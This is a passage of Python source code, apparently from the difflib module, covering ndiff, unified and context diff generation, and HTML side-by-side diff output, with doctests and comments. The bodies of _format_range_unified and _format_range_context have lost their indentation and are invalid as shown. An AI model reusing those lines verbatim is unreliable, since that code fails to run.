        - three
        ?  -
        + tree
        + emu
        """
        # Line-level diff drives everything; each opcode is expanded into
        # delta lines by a per-tag generator.
        cruncher = SequenceMatcher(self.linejunk, a, b)
        for tag, alo, ahi, blo, bhi in cruncher.get_opcodes():
            if tag == 'replace':
                g = self._fancy_replace(a, alo, ahi, b, blo, bhi)
            elif tag == 'delete':
                g = self._dump('-', a, alo, ahi)
            elif tag == 'insert':
                g = self._dump('+', b, blo, bhi)
            elif tag == 'equal':
                g = self._dump(' ', a, alo, ahi)
            else:
                raise ValueError('unknown tag %r' % (tag,))
            for line in g:
                yield line

    def _dump(self, tag, x, lo, hi):
        """Generate comparison results for a same-tagged range.

        Yields each of x[lo:hi] prefixed with the one-character tag and
        a space.
        """
        for i in range(lo, hi):
            yield '%s %s' % (tag, x[i])

    def _plain_replace(self, a, alo, ahi, b, blo, bhi):
        # Fallback for a 'replace' opcode with no similar line pair:
        # dump all deletions then all insertions (or vice versa).
        assert alo < ahi and blo < bhi
        # dump the shorter block first -- reduces the burden on short-term
        # memory if the blocks are of very different sizes
        if bhi - blo < ahi - alo:
            first  = self._dump('+', b, blo, bhi)
            second = self._dump('-', a, alo, ahi)
        else:
            first  = self._dump('-', a, alo, ahi)
            second = self._dump('+', b, blo, bhi)

        for g in first, second:
            for line in g:
                yield line

    def _fancy_replace(self, a, alo, ahi, b, blo, bhi):
        r"""
        When replacing one block of lines with another, search the blocks
        for *similar* lines; the best-matching pair (if any) is used as a
        synch point, and intraline difference marking is done on the
        similar pair.  Lots of work, but often worth it.

        Example:

        >>> d = Differ()
        >>> results = d._fancy_replace(['abcDefghiJkl\n'], 0, 1,
        ...                            ['abcdefGhijkl\n'], 0, 1)
        >>> print(''.join(results), end="")
        - abcDefghiJkl
        ?    ^  ^  ^
        + abcdefGhijkl
        ?    ^  ^  ^
        """
        # don't synch up unless the lines have a similarity score of at
        # least cutoff; best_ratio tracks the best score seen so far
        best_ratio, cutoff = 0.74, 0.75
        cruncher = SequenceMatcher(self.charjunk)
        eqi, eqj = None, None   # 1st indices of equal lines (if any)

        # search for the pair that matches best without being identical
        # (identical lines must be junk lines, & we don't want to synch up
        # on junk -- unless we have to)
        for j in range(blo, bhi):
            bj = b[j]
            cruncher.set_seq2(bj)
            for i in range(alo, ahi):
                ai = a[i]
                if ai == bj:
                    if eqi is None:
                        eqi, eqj = i, j
                    continue
                cruncher.set_seq1(ai)
                # computing similarity is expensive, so use the quick
                # upper bounds first -- have seen this speed up messy
                # compares by a factor of 3.
                # note that ratio() is only expensive to compute the first
                # time it's called on a sequence pair; the expensive part
                # of the computation is cached by cruncher
                if cruncher.real_quick_ratio() > best_ratio and \
                      cruncher.quick_ratio() > best_ratio and \
                      cruncher.ratio() > best_ratio:
                    best_ratio, best_i, best_j = cruncher.ratio(), i, j
        if best_ratio < cutoff:
            # no non-identical "pretty close" pair
            if eqi is None:
                # no identical pair either -- treat it as a straight replace
                for line in self._plain_replace(a, alo, ahi, b, blo, bhi):
                    yield line
                return
            # no close pair, but an identical pair -- synch up on that
            best_i, best_j, best_ratio = eqi, eqj, 1.0
        else:
            # there's a close pair, so forget the identical pair (if any)
            eqi = None

        # a[best_i] very similar to b[best_j]; eqi is None iff they're not
        # identical
        # (best_i/best_j are guaranteed bound here: either the loop set them
        # when a ratio beat best_ratio, or the eqi branch above assigned them)

        # pump out diffs from before the synch point
        for line in self._fancy_helper(a, alo, best_i, b, blo, best_j):
            yield line

        # do intraline marking on the synch pair
        aelt, belt = a[best_i], b[best_j]
        if eqi is None:
            # pump out a '-', '?', '+', '?' quad for the synched lines
            atags = btags = ""
            cruncher.set_seqs(aelt, belt)
            for tag, ai1, ai2, bj1, bj2 in cruncher.get_opcodes():
                la, lb = ai2 - ai1, bj2 - bj1
                if tag == 'replace':
                    atags += '^' * la
                    btags += '^' * lb
                elif tag == 'delete':
                    atags += '-' * la
                elif tag == 'insert':
                    btags += '+' * lb
                elif tag == 'equal':
                    atags += ' ' * la
                    btags += ' ' * lb
                else:
                    raise ValueError('unknown tag %r' % (tag,))
            for line in self._qformat(aelt, belt, atags, btags):
                yield line
        else:
            # the synch pair is identical
            yield '  ' + aelt

        # pump out diffs from after the synch point
        for line in self._fancy_helper(a, best_i+1, ahi, b, best_j+1, bhi):
            yield line

    def _fancy_helper(self, a, alo, ahi, b, blo, bhi):
        # Recurse into _fancy_replace when both sides are non-empty;
        # otherwise just dump the one-sided leftover range.
        g = []
        if alo < ahi:
            if blo < bhi:
                g = self._fancy_replace(a, alo, ahi, b, blo, bhi)
            else:
                g = self._dump('-', a, alo, ahi)
        elif blo < bhi:
            g = self._dump('+', b, blo, bhi)

        for line in g:
            yield line

    def _qformat(self, aline, bline, atags, btags):
        r"""
        Format "?" output and deal with leading tabs.

        Example:

        >>> d = Differ()
        >>> results = d._qformat('\tabcDefghiJkl\n', '\tabcdefGhijkl\n',
        ...                      '  ^ ^  ^      ', '  ^ ^  ^      ')
        >>> for line in results: print(repr(line))
        ...
        '- \tabcDefghiJkl\n'
        '? \t ^ ^  ^\n'
        '+ \tabcdefGhijkl\n'
        '? \t ^ ^  ^\n'
        """
        # Can hurt, but will probably help most of the time.
        # Replace the common leading tab run with literal tabs in the '?'
        # guide lines so markers stay aligned under tab-indented text.
        common = min(_count_leading(aline, "\t"),
                     _count_leading(bline, "\t"))
        common = min(common, _count_leading(atags[:common], " "))
        common = min(common, _count_leading(btags[:common], " "))
        atags = atags[common:].rstrip()
        btags = btags[common:].rstrip()

        yield "- " + aline
        if atags:
            yield "? %s%s\n" % ("\t" * common, atags)

        yield "+ " + bline
        if btags:
            yield "? %s%s\n" % ("\t" * common, btags)
# With respect to junk, an earlier version of ndiff simply refused to
# *start* a match with a junk element. The result was cases like this:
# before: private Thread currentThread;
# after: private volatile Thread currentThread;
# If you consider whitespace to be junk, the longest contiguous match
# not starting with junk is "e Thread currentThread". So ndiff reported
# that "e volatil" was inserted between the 't' and the 'e' in "private".
# While an accurate view, to people that's absurd. The current version
# looks for matching blocks that are entirely junk-free, then extends the
# longest one of those as far as possible but only with matching junk.
# So now "currentThread" is matched, then extended to suck up the
# preceding blank; then "private" is matched, and extended to suck up the
# following blank; then "Thread" is matched; and finally ndiff reports
# that "volatile " was inserted before "Thread". The only quibble
# remaining is that perhaps it was really the case that " volatile"
# was inserted after "private". I can live with that <wink>.
import re
def IS_LINE_JUNK(line, pat=re.compile(r"\s*#?\s*$").match):
    r"""
    Return 1 for ignorable line: iff `line` is blank or contains a single '#'.

    Examples:

    >>> IS_LINE_JUNK('\n')
    True
    >>> IS_LINE_JUNK('  #   \n')
    True
    >>> IS_LINE_JUNK('hello\n')
    False
    """
    # The pattern (bound once, at definition time) matches whitespace
    # optionally surrounding a single '#'.
    result = pat(line)
    return result is not None
def IS_CHARACTER_JUNK(ch, ws=" \t"):
    r"""
    Return 1 for ignorable character: iff `ch` is a space or tab.

    Examples:

    >>> IS_CHARACTER_JUNK(' ')
    True
    >>> IS_CHARACTER_JUNK('\t')
    True
    >>> IS_CHARACTER_JUNK('\n')
    False
    >>> IS_CHARACTER_JUNK('x')
    False
    """
    # Membership test against the default whitespace set (blank and tab;
    # newline deliberately excluded).
    return ws.find(ch) >= 0
########################################################################
### Unified Diff
########################################################################
def _format_range_unified(start, stop):
'Convert range to the "ed" format'
# Per the diff spec at http://www.unix.org/single_unix_specification/
beginning = start + 1 # lines start numbering with one
length = stop - start
if length == 1:
return '{}'.format(beginning)
if not length:
beginning -= 1 # empty ranges begin at line just before the range
return '{},{}'.format(beginning, length)
def unified_diff(a, b, fromfile='', tofile='', fromfiledate='',
                 tofiledate='', n=3, lineterm='\n'):
    r"""
    Compare two sequences of lines; generate the delta as a unified diff.

    Unified diffs are a compact way of showing line changes and a few
    lines of context.  The number of context lines is set by 'n' which
    defaults to three.

    By default, the diff control lines (those with ---, +++, or @@) are
    created with a trailing newline.  This is helpful so that inputs
    created from file.readlines() result in diffs that are suitable for
    file.writelines() since both the inputs and outputs have trailing
    newlines.

    For inputs that do not have trailing newlines, set the lineterm
    argument to "" so that the output will be uniformly newline free.

    The unidiff format normally has a header for filenames and modification
    times.  Any or all of these may be specified using strings for
    'fromfile', 'tofile', 'fromfiledate', and 'tofiledate'.
    The modification times are normally expressed in the ISO 8601 format.

    Example:

    >>> for line in unified_diff('one two three four'.split(),
    ...             'zero one tree four'.split(), 'Original', 'Current',
    ...             '2005-01-26 23:30:50', '2010-04-02 10:20:52',
    ...             lineterm=''):
    ...     print(line)                 # doctest: +NORMALIZE_WHITESPACE
    --- Original        2005-01-26 23:30:50
    +++ Current         2010-04-02 10:20:52
    @@ -1,4 +1,4 @@
    +zero
     one
    -two
    -three
    +tree
     four
    """
    header_emitted = False
    for group in SequenceMatcher(None,a,b).get_grouped_opcodes(n):
        # The file header is written lazily, just before the first hunk,
        # so identical inputs produce no output at all.
        if not header_emitted:
            header_emitted = True
            fromdate = '\t{}'.format(fromfiledate) if fromfiledate else ''
            todate = '\t{}'.format(tofiledate) if tofiledate else ''
            yield '--- {}{}{}'.format(fromfile, fromdate, lineterm)
            yield '+++ {}{}{}'.format(tofile, todate, lineterm)
        first, last = group[0], group[-1]
        range_a = _format_range_unified(first[1], last[2])
        range_b = _format_range_unified(first[3], last[4])
        yield '@@ -{} +{} @@{}'.format(range_a, range_b, lineterm)
        for tag, i1, i2, j1, j2 in group:
            if tag == 'equal':
                for line in a[i1:i2]:
                    yield ' ' + line
            else:
                if tag in {'replace', 'delete'}:
                    for line in a[i1:i2]:
                        yield '-' + line
                if tag in {'replace', 'insert'}:
                    for line in b[j1:j2]:
                        yield '+' + line
########################################################################
### Context Diff
########################################################################
def _format_range_context(start, stop):
'Convert range to the "ed" format'
# Per the diff spec at http://www.unix.org/single_unix_specification/
beginning = start + 1 # lines start numbering with one
length = stop - start
if not length:
beginning -= 1 # empty ranges begin at line just before the range
if length <= 1:
return '{}'.format(beginning)
return '{},{}'.format(beginning, beginning + length - 1)
# See http://www.unix.org/single_unix_specification/
def context_diff(a, b, fromfile='', tofile='',
                 fromfiledate='', tofiledate='', n=3, lineterm='\n'):
    r"""
    Compare two sequences of lines; generate the delta as a context diff.

    Context diffs are a compact way of showing line changes and a few
    lines of context.  The number of context lines is set by 'n' which
    defaults to three.

    By default, the diff control lines (those with *** or ---) are
    created with a trailing newline.  This is helpful so that inputs
    created from file.readlines() result in diffs that are suitable for
    file.writelines() since both the inputs and outputs have trailing
    newlines.

    For inputs that do not have trailing newlines, set the lineterm
    argument to "" so that the output will be uniformly newline free.

    The context diff format normally has a header for filenames and
    modification times.  Any or all of these may be specified using
    strings for 'fromfile', 'tofile', 'fromfiledate', and 'tofiledate'.
    The modification times are normally expressed in the ISO 8601 format.
    If not specified, the strings default to blanks.

    Example:

    >>> print(''.join(context_diff('one\ntwo\nthree\nfour\n'.splitlines(1),
    ...       'zero\none\ntree\nfour\n'.splitlines(1), 'Original', 'Current')),
    ...       end="")
    *** Original
    --- Current
    ***************
    *** 1,4 ****
      one
    ! two
    ! three
      four
    --- 1,4 ----
    + zero
      one
    ! tree
      four
    """
    prefix = dict(insert='+ ', delete='- ', replace='! ', equal='  ')
    header_emitted = False
    for group in SequenceMatcher(None,a,b).get_grouped_opcodes(n):
        # Header lines are produced lazily, only once a hunk exists.
        if not header_emitted:
            header_emitted = True
            fromdate = '\t{}'.format(fromfiledate) if fromfiledate else ''
            todate = '\t{}'.format(tofiledate) if tofiledate else ''
            yield '*** {}{}{}'.format(fromfile, fromdate, lineterm)
            yield '--- {}{}{}'.format(tofile, todate, lineterm)
        first, last = group[0], group[-1]
        yield '***************' + lineterm
        # The "from" half is printed only when it actually changed.
        tags_present = {op[0] for op in group}
        range_a = _format_range_context(first[1], last[2])
        yield '*** {} ****{}'.format(range_a, lineterm)
        if tags_present & {'replace', 'delete'}:
            for tag, i1, i2, _, _ in group:
                if tag != 'insert':
                    for line in a[i1:i2]:
                        yield prefix[tag] + line
        # Likewise, the "to" half is printed only when it changed.
        range_b = _format_range_context(first[3], last[4])
        yield '--- {} ----{}'.format(range_b, lineterm)
        if tags_present & {'replace', 'insert'}:
            for tag, _, _, j1, j2 in group:
                if tag != 'delete':
                    for line in b[j1:j2]:
                        yield prefix[tag] + line
def ndiff(a, b, linejunk=None, charjunk=IS_CHARACTER_JUNK):
    r"""
    Compare `a` and `b` (lists of strings); return a `Differ`-style delta.

    Optional keyword parameters `linejunk` and `charjunk` are for filter
    functions (or None):

    - linejunk: A function that should accept a single string argument, and
      return true iff the string is junk.  The default is None, and is
      recommended; as of Python 2.3, an adaptive notion of "noise" lines is
      used that does a good job on its own.

    - charjunk: A function that should accept a string of length 1. The
      default is module-level function IS_CHARACTER_JUNK, which filters out
      whitespace characters (a blank or tab; note: bad idea to include newline
      in this!).

    Tools/scripts/ndiff.py is a command-line front-end to this function.

    Example:

    >>> diff = ndiff('one\ntwo\nthree\n'.splitlines(1),
    ...              'ore\ntree\nemu\n'.splitlines(1))
    >>> print(''.join(diff), end="")
    - one
    ?  ^
    + ore
    ?  ^
    - two
    - three
    ?  -
    + tree
    + emu
    """
    # Thin convenience wrapper: build a Differ with the given filters and
    # hand back its comparison generator.
    differencer = Differ(linejunk, charjunk)
    return differencer.compare(a, b)
def _mdiff(fromlines, tolines, context=None, linejunk=None,
           charjunk=IS_CHARACTER_JUNK):
    r"""Returns generator yielding marked up from/to side by side differences.

    Arguments:
    fromlines -- list of text lines to compared to tolines
    tolines -- list of text lines to be compared to fromlines
    context -- number of context lines to display on each side of difference,
               if None, all from/to text lines will be generated.
    linejunk -- passed on to ndiff (see ndiff documentation)
    charjunk -- passed on to ndiff (see ndiff documentation)

    This function returns an iterator which returns a tuple:
    (from line tuple, to line tuple, boolean flag)

    from/to line tuple -- (line num, line text)
      line num -- integer or None (to indicate a context separation)
      line text -- original line text with following markers inserted:
        '\0+' -- marks start of added text
        '\0-' -- marks start of deleted text
        '\0^' -- marks start of changed text
        '\1' -- marks end of added/deleted/changed text

    boolean flag -- None indicates context separation, True indicates
        either "from" or "to" line contains a change, otherwise False.

    This function/iterator was originally developed to generate side by side
    file difference for making HTML pages (see HtmlDiff class for example
    usage).

    Note, this function utilizes the ndiff function to generate the side by
    side difference markup.  Optional ndiff arguments may be passed to this
    function and they in turn will be passed to ndiff.
    """
    import re

    # Regular expression for finding intraline change indices.
    # Raw string: '\+', '\-', '\^' are invalid escape sequences in a plain
    # string literal (DeprecationWarning, later SyntaxWarning/Error).
    change_re = re.compile(r'(\++|\-+|\^+)')

    # create the difference iterator to generate the differences
    diff_lines_iterator = ndiff(fromlines, tolines, linejunk, charjunk)

    def _make_line(lines, format_key, side, num_lines=[0, 0]):
        """Returns line of text with user's change markup and line formatting.

        lines -- list of lines from the ndiff generator to produce a line of
                 text from.  When producing the line of text to return, the
                 lines used are removed from this list.
        format_key -- '+' return first line in list with "add" markup around
                          the entire line.
                      '-' return first line in list with "delete" markup around
                          the entire line.
                      '?' return first line in list with add/delete/change
                          intraline markup (indices obtained from second line)
                      None return first line in list with no markup
        side -- indice into the num_lines list (0=from,1=to)
        num_lines -- from/to current line number.  This is NOT intended to be a
                     passed parameter.  It is present as a keyword argument to
                     maintain memory of the current line numbers between calls
                     of this function.

        Note, this function is purposefully not defined at the module scope so
        that data it needs from its parent function (within whose context it
        is defined) does not need to be of module scope.
        """
        num_lines[side] += 1
        # Handle case where no user markup is to be added, just return line of
        # text with user's line format to allow for usage of the line number.
        if format_key is None:
            return (num_lines[side], lines.pop(0)[2:])
        # Handle case of intraline changes
        if format_key == '?':
            text, markers = lines.pop(0), lines.pop(0)
            # find intraline changes (store change type and indices in tuples)
            sub_info = []
            def record_sub_info(match_object, sub_info=sub_info):
                sub_info.append([match_object.group(1)[0], match_object.span()])
                return match_object.group(1)
            change_re.sub(record_sub_info, markers)
            # process each tuple inserting our special marks that won't be
            # noticed by an xml/html escaper.
            for key, (begin, end) in sub_info[::-1]:
                text = text[0:begin] + '\0' + key + text[begin:end] + '\1' + text[end:]
            text = text[2:]
        # Handle case of add/delete entire line
        else:
            text = lines.pop(0)[2:]
            # if line of text is just a newline, insert a space so there is
            # something for the user to highlight and see.
            if not text:
                text = ' '
            # insert marks that won't be noticed by an xml/html escaper.
            text = '\0' + format_key + text + '\1'
        # Return line of text, first allow user's line formatter to do its
        # thing (such as adding the line number) then replace the special
        # marks with what the user's change markup.
        return (num_lines[side], text)

    def _line_iterator():
        """Yields from/to lines of text with a change indication.

        This function is an iterator.  It itself pulls lines from a
        differencing iterator, processes them and yields them.  When it can
        it yields both a "from" and a "to" line, otherwise it will yield one
        or the other.  In addition to yielding the lines of from/to text, a
        boolean flag is yielded to indicate if the text line(s) have
        differences in them.

        Note, this function is purposefully not defined at the module scope so
        that data it needs from its parent function (within whose context it
        is defined) does not need to be of module scope.
        """
        lines = []
        num_blanks_pending, num_blanks_to_yield = 0, 0
        while True:
            # Load up next 4 lines so we can look ahead, create strings which
            # are a concatenation of the first character of each of the 4 lines
            # so we can do some very readable comparisons.
            while len(lines) < 4:
                # 'X' pads past the end of the diff; no try/except needed
                # thanks to next()'s default argument.
                lines.append(next(diff_lines_iterator, 'X'))
            s = ''.join([line[0] for line in lines])
            if s.startswith('X'):
                # When no more lines, pump out any remaining blank lines so the
                # corresponding add/delete lines get a matching blank line so
                # all line pairs get yielded at the next level.
                num_blanks_to_yield = num_blanks_pending
            elif s.startswith('-?+?'):
                # simple intraline change
                yield _make_line(lines, '?', 0), _make_line(lines, '?', 1), True
                continue
            elif s.startswith('--++'):
                # in delete block, add block coming: we do NOT want to get
                # caught up on blank lines yet, just process the delete line
                num_blanks_pending -= 1
                yield _make_line(lines, '-', 0), None, True
                continue
            elif s.startswith(('--?+', '--+', '- ')):
                # in delete block and see an intraline change or unchanged line
                # coming: yield the delete line and then blanks
                from_line, to_line = _make_line(lines, '-', 0), None
                num_blanks_to_yield, num_blanks_pending = num_blanks_pending - 1, 0
            elif s.startswith('-+?'):
                # intraline change
                yield _make_line(lines, None, 0), _make_line(lines, '?', 1), True
                continue
            elif s.startswith('-?+'):
                # intraline change
                yield _make_line(lines, '?', 0), _make_line(lines, None, 1), True
                continue
            elif s.startswith('-'):
                # delete FROM line
                num_blanks_pending -= 1
                yield _make_line(lines, '-', 0), None, True
                continue
            elif s.startswith('+--'):
                # in add block, delete block coming: we do NOT want to get
                # caught up on blank lines yet, just process the add line
                num_blanks_pending += 1
                yield None, _make_line(lines, '+', 1), True
                continue
            elif s.startswith(('+ ', '+-')):
                # will be leaving an add block: yield blanks then add line
                from_line, to_line = None, _make_line(lines, '+', 1)
                num_blanks_to_yield, num_blanks_pending = num_blanks_pending + 1, 0
            elif s.startswith('+'):
                # inside an add block, yield the add line
                num_blanks_pending += 1
                yield None, _make_line(lines, '+', 1), True
                continue
            elif s.startswith(' '):
                # unchanged text, yield it to both sides
                yield _make_line(lines[:], None, 0), _make_line(lines, None, 1), False
                continue
            # Catch up on the blank lines so when we yield the next from/to
            # pair, they are lined up.
            while(num_blanks_to_yield < 0):
                num_blanks_to_yield += 1
                yield None, ('', '\n'), True
            while(num_blanks_to_yield > 0):
                num_blanks_to_yield -= 1
                yield ('', '\n'), None, True
            if s.startswith('X'):
                # PEP 479: a generator must return to finish; raising
                # StopIteration here would become RuntimeError on Python 3.7+.
                return
            else:
                yield from_line, to_line, True

    def _line_pair_iterator():
        """Yields from/to lines of text with a change indication.

        This function is an iterator.  It itself pulls lines from the line
        iterator.  Its difference from that iterator is that this function
        always yields a pair of from/to text lines (with the change
        indication).  If necessary it will collect single from/to lines
        until it has a matching pair from/to pair to yield.

        Note, this function is purposefully not defined at the module scope so
        that data it needs from its parent function (within whose context it
        is defined) does not need to be of module scope.
        """
        line_iterator = _line_iterator()
        fromlines, tolines = [], []
        while True:
            # Collecting lines of text until we have a from/to pair
            while (len(fromlines) == 0 or len(tolines) == 0):
                try:
                    from_line, to_line, found_diff = next(line_iterator)
                except StopIteration:
                    # PEP 479: translate exhaustion of the inner iterator
                    # into a clean end of this generator.
                    return
                if from_line is not None:
                    fromlines.append((from_line, found_diff))
                if to_line is not None:
                    tolines.append((to_line, found_diff))
            # Once we have a pair, remove them from the collection and yield it
            from_line, from_diff = fromlines.pop(0)
            to_line, to_diff = tolines.pop(0)
            yield (from_line, to_line, from_diff or to_diff)

    # Handle case where user does not want context differencing, just yield
    # them up without doing anything else with them.
    line_pair_iterator = _line_pair_iterator()
    if context is None:
        yield from line_pair_iterator
    # Handle case where user wants context differencing.  We must do some
    # storage of lines until we know for sure that they are to be yielded.
    else:
        context += 1
        lines_to_write = 0
        while True:
            # Store lines up until we find a difference, note use of a
            # circular queue because we only need to keep around what
            # we need for context.
            index, contextLines = 0, [None] * (context)
            found_diff = False
            while(found_diff is False):
                try:
                    from_line, to_line, found_diff = next(line_pair_iterator)
                except StopIteration:
                    # PEP 479: end of diff, end of generator.
                    return
                i = index % context
                contextLines[i] = (from_line, to_line, found_diff)
                index += 1
            # Yield lines that we have collected so far, but first yield
            # the user's separator.
            if index > context:
                yield None, None, None
                lines_to_write = context
            else:
                lines_to_write = index
                index = 0
            while(lines_to_write):
                i = index % context
                index += 1
                yield contextLines[i]
                lines_to_write -= 1
            # Now yield the context lines after the change
            lines_to_write = context - 1
            try:
                while(lines_to_write):
                    from_line, to_line, found_diff = next(line_pair_iterator)
                    # If another change within the context, extend the context
                    if found_diff:
                        lines_to_write = context - 1
                    else:
                        lines_to_write -= 1
                    yield from_line, to_line, found_diff
            except StopIteration:
                # PEP 479: the underlying iterator is exhausted; finish.
                return
# Skeleton of the complete HTML document produced by HtmlDiff.make_file();
# the %(styles)s / %(table)s / %(legend)s slots are filled in there.
_file_template = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1" />
<title></title>
<style type="text/css">%(styles)s
</style>
</head>
<body>
%(table)s%(legend)s
</body>
</html>"""

# Default CSS: one class per diff category (header, add, change, delete,
# "next change" navigation column).  Overridable via HtmlDiff._styles.
_styles = """
table.diff {font-family:Courier; border:medium;}
.diff_header {background-color:#e0e0e0}
td.diff_header {text-align:right}
.diff_next {background-color:#c0c0c0}
.diff_add {background-color:#aaffaa}
.diff_chg {background-color:#ffff77}
.diff_sub {background-color:#ffaaaa}"""

# Skeleton of the side-by-side table itself; %(prefix)s makes anchor ids
# unique when several tables share one page, %(data_rows)s holds the rows.
_table_template = """
<table class="diff" id="difflib_chg_%(prefix)s_top"
cellspacing="0" cellpadding="0" rules="groups" >
<colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
<colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
%(header_row)s
<tbody>
%(data_rows)s </tbody>
</table>"""

# Static legend table explaining the colors and the f/n/t navigation links.
_legend = """
<table class="diff" summary="Legends">
<tr> <th colspan="2"> Legends </th> </tr>
<tr> <td> <table border="" summary="Colors">
<tr><th> Colors </th> </tr>
<tr><td class="diff_add"> Added </td></tr>
<tr><td class="diff_chg">Changed</td> </tr>
<tr><td class="diff_sub">Deleted</td> </tr>
</table></td>
<td> <table border="" summary="Links">
<tr><th colspan="2"> Links </th> </tr>
<tr><td>(f)irst change</td> </tr>
<tr><td>(n)ext change</td> </tr>
<tr><td>(t)op</td> </tr>
</table></td> </tr>
</table>"""
class HtmlDiff(object):
    """For producing HTML side by side comparison with change highlights.

    This class can be used to create an HTML table (or a complete HTML file
    containing the table) showing a side by side, line by line comparison
    of text with inter-line and intra-line change highlights.  The table can
    be generated in either full or contextual difference mode.

    The following methods are provided for HTML generation:

    make_table -- generates HTML for a single side by side table
    make_file -- generates complete HTML file with a single side by side table

    See tools/scripts/diff.py for an example usage of this class.
    """

    _file_template = _file_template
    _styles = _styles
    _table_template = _table_template
    _legend = _legend
    _default_prefix = 0

    def __init__(self, tabsize=8, wrapcolumn=None, linejunk=None,
                 charjunk=IS_CHARACTER_JUNK):
        """HtmlDiff instance initializer

        Arguments:
        tabsize -- tab stop spacing, defaults to 8.
        wrapcolumn -- column number where lines are broken and wrapped,
            defaults to None where lines are not wrapped.
        linejunk,charjunk -- keyword arguments passed into ndiff() (used by
            HtmlDiff() to generate the side by side HTML differences).  See
            ndiff() documentation for argument default values and descriptions.
        """
        self._tabsize = tabsize
        self._wrapcolumn = wrapcolumn
        self._linejunk = linejunk
        self._charjunk = charjunk

    def make_file(self, fromlines, tolines, fromdesc='', todesc='', context=False,
                  numlines=5):
        """Returns HTML file of side by side comparison with change highlights

        Arguments:
        fromlines -- list of "from" lines
        tolines -- list of "to" lines
        fromdesc -- "from" file column header string
        todesc -- "to" file column header string
        context -- set to True for contextual differences (defaults to False
            which shows full differences).
        numlines -- number of context lines.  When context is set True,
            controls number of lines displayed before and after the change.
            When context is False, controls the number of lines to place
            the "next" link anchors before the next change (so click of
            "next" link jumps to just before the change).
        """
        return self._file_template % dict(
            styles=self._styles,
            legend=self._legend,
            table=self.make_table(fromlines, tolines, fromdesc, todesc,
                                  context=context, numlines=numlines))

    def _tab_newline_replace(self, fromlines, tolines):
        """Returns from/to line lists with tabs expanded and newlines removed.

        Instead of tab characters being replaced by the number of spaces
        needed to fill in to the next tab stop, this function will fill
        the space with tab characters.  This is done so that the difference
        algorithms can identify changes in a file when tabs are replaced by
        spaces and vice versa.  At the end of the HTML generation, the tab
        characters will be replaced with a nonbreakable space.
        """
        def expand_tabs(line):
            # hide real spaces
            line = line.replace(' ', '\0')
            # expand tabs into spaces
            line = line.expandtabs(self._tabsize)
            # replace spaces from expanded tabs back into tab characters
            # (we'll replace them with markup after we do differencing)
            line = line.replace(' ', '\t')
            return line.replace('\0', ' ').rstrip('\n')
        fromlines = [expand_tabs(line) for line in fromlines]
        tolines = [expand_tabs(line) for line in tolines]
        return fromlines, tolines

    def _split_line(self, data_list, line_num, text):
        """Builds list of text lines by splitting text lines at wrap point

        This function will determine if the input text line needs to be
        wrapped (split) into separate lines.  If so, the first wrap point
        will be determined and the first line appended to the output
        text line list.  This function is used recursively to handle
        the second part of the split line to further split it.
        """
        # if blank line or context separator, just add it to the output list
        if not line_num:
            data_list.append((line_num, text))
            return

        # if line text doesn't need wrapping, just add it to the output list
        size = len(text)
        max = self._wrapcolumn
        if (size <= max) or ((size - (text.count('\0') * 3)) <= max):
            data_list.append((line_num, text))
            return

        # scan text looking for the wrap point, keeping track if the wrap
        # point is inside markers
        i = 0
        n = 0
        mark = ''
        while n < max and i < size:
            if text[i] == '\0':
                i += 1
                mark = text[i]
                i += 1
            elif text[i] == '\1':
                i += 1
                mark = ''
            else:
                i += 1
                n += 1

        # wrap point is inside text, break it up into separate lines
        line1 = text[:i]
        line2 = text[i:]

        # if wrap point is inside markers, place end marker at end of first
        # line and start marker at beginning of second line because each
        # line will have its own table tag markup around it.
        if mark:
            line1 = line1 + '\1'
            line2 = '\0' + mark + line2

        # tack on first line onto the output list
        data_list.append((line_num, line1))

        # use this routine again to wrap the remaining text
        self._split_line(data_list, '>', line2)

    def _line_wrapper(self, diffs):
        """Returns iterator that splits (wraps) mdiff text lines"""

        # pull from/to data and flags from mdiff iterator
        for fromdata, todata, flag in diffs:
            # check for context separators and pass them through
            if flag is None:
                yield fromdata, todata, flag
                continue
            (fromline, fromtext), (toline, totext) = fromdata, todata
            # for each from/to line split it at the wrap column to form
            # list of text lines.
            fromlist, tolist = [], []
            self._split_line(fromlist, fromline, fromtext)
            self._split_line(tolist, toline, totext)
            # yield from/to line in pairs inserting blank lines as
            # necessary when one side has more wrapped lines
            while fromlist or tolist:
                if fromlist:
                    fromdata = fromlist.pop(0)
                else:
                    fromdata = ('', ' ')
                if tolist:
                    todata = tolist.pop(0)
                else:
                    todata = ('', ' ')
                yield fromdata, todata, flag

    def _collect_lines(self, diffs):
        """Collects mdiff output into separate lists

        Before storing the mdiff from/to data into a list, it is converted
        into a single line of text with HTML markup.
        """

        fromlist, tolist, flaglist = [], [], []
        # pull from/to data and flags from mdiff style iterator
        for fromdata, todata, flag in diffs:
            try:
                # store HTML markup of the lines into the lists
                fromlist.append(self._format_line(0, flag, *fromdata))
                tolist.append(self._format_line(1, flag, *todata))
            except TypeError:
                # exceptions occur for lines where context separators go
                fromlist.append(None)
                tolist.append(None)
            flaglist.append(flag)
        return fromlist, tolist, flaglist

    def _format_line(self, side, flag, linenum, text):
        """Returns HTML markup of "from" / "to" text lines

        side -- 0 or 1 indicating "from" or "to" text
        flag -- indicates if difference on line
        linenum -- line number (used for line number column)
        text -- line text to be marked up
        """
        try:
            linenum = '%d' % linenum
            id = ' id="%s%s"' % (self._prefix[side], linenum)
        except TypeError:
            # handle blank lines where linenum is '>' or ''
            id = ''
        # Escape characters that would otherwise be interpreted as HTML.
        # (Fix: the entity references had been corrupted into identity
        # replacements, which left the output unescaped.)
        text = text.replace("&", "&amp;").replace(">", "&gt;").replace("<", "&lt;")

        # make space non-breakable so they don't get compressed or line wrapped
        text = text.replace(' ', '&nbsp;').rstrip()

        return '<td class="diff_header"%s>%s</td><td nowrap="nowrap">%s</td>' \
               % (id, linenum, text)

    def _make_prefix(self):
        """Create unique anchor prefixes"""

        # Generate a unique anchor prefix so multiple tables
        # can exist on the same HTML page without conflicts.
        fromprefix = "from%d_" % HtmlDiff._default_prefix
        toprefix = "to%d_" % HtmlDiff._default_prefix
        HtmlDiff._default_prefix += 1
        # store prefixes so line format method has access
        self._prefix = [fromprefix, toprefix]

    def _convert_flags(self, fromlist, tolist, flaglist, context, numlines):
        """Makes list of "next" links"""

        # all anchor names will be generated using the unique "to" prefix
        toprefix = self._prefix[1]

